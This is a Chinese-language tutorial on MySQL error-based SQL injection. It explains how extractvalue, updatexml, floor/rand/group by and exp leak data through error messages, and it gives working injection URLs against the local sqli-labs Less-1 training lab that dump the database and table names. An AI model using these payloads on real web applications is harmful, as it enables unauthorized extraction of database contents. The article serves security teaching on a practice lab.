SQL報錯注入概述

通過構(gòu)造特定的SQL語句，讓攻擊者想要查詢的信息（如數(shù)據(jù)庫名、版本號、用戶名等）通過頁面面的錯誤提示回顯出來。

報錯注入的前提條件

• Web應(yīng)用程序未關(guān)閉數(shù)據(jù)庫報錯函數(shù)，對于一些SQL語句的錯誤直接回顯在頁面上
• 后臺未對一些具有報錯功能的函數(shù)（如extractvalue、updatexml等）進行過濾

Xpath類型函數(shù)

extractvalue()

作用：對XML文檔進行查詢，相當于在HTML文件中用標簽查找元素。

語法: extractvalue( XML_document, XPath_string )

• 參數(shù)1：XML_document是String格式，為XML文檔對象的名稱
• 參數(shù)2：XPath_string(Xpath格式的字符串)，注入時可操作的地方

報錯原理：xml文檔中查找字符位置是用/xxx/xxx/xxx/...這種格式，如果寫入其他格式就會報錯，并且會返回寫入的非法格式內(nèi)容，錯誤信息如：XPATH syntax error:'xxxxxxxx‘

updatexml()

作用：改變文檔中符合條件的節(jié)點的值。

語法: updatexml( XML_document, XPath_string, new_value )

• 參數(shù)1：XML_document是String格式，為XML文檔對象的名稱
• 參數(shù)2：XPath_string(Xpath格式的字符串)，注入時可操作的地方
• 參數(shù)3：new_value，String格式，替換查找到的符合條件的數(shù)據(jù)

報錯原理:同extractvalue()

其他函數(shù)

floor()、rand()、count()、group by聯(lián)用

作用

floor(x)：對參數(shù)x向下取整

rand()：生成一個0～1之間的隨機浮點數(shù)

count(*)：統(tǒng)計某個表下總共有多少條記錄

group by x: 按照 (by) 一定的規(guī)則（x）進行分組

報錯原理：group by與rand()使用時，如果臨時表中沒有該主鍵，則在插入前會再計算一次rand()，然后再由group by將計算出來的主鍵直接插入到臨時表格中，導(dǎo)致主鍵重復(fù)報錯

exp()（5.5.5<= MySQL數(shù)據(jù)庫版本號<=5.5.49）

作用：計算以e（自然常數(shù)）為底的冪值

語法: exp(x)

報錯原理：當參數(shù)x超過710時，exp()函數(shù)會報錯，錯誤信息如：DOUBLE value is of range:

MySQL數(shù)據(jù)庫報錯功能函數(shù)總匯

報錯注入實例

extractvalue()

依然用sqli/Less-1

直接用報錯函數(shù)進行暴庫操作

暴庫

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database())) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

后面的步驟大致相同，不再演示

updatexml()

暴庫

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',database()),1) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

總結(jié) 

到此這篇關(guān)于SQL注入教程之報錯注入的文章就介紹到這了,更多相關(guān)SQL報錯注入內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評論